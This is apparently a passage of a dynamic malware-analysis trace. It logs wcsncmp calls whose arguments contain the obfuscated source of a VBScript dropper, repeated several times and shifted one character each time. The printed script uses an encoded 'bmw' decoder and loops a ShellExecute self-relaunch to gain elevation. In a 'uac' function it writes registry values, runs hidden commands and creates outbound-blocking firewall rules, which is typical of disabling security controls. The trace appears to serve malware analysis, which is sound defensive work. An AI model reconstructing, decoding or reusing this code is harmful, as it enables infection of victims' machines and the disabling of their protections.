bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.012] wcsncmp (_String1="Rule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.012] wcsncmp (_String1="ule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.012] wcsncmp (_String1="le\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.012] wcsncmp (_String1="e\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.012] wcsncmp (_String1="\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 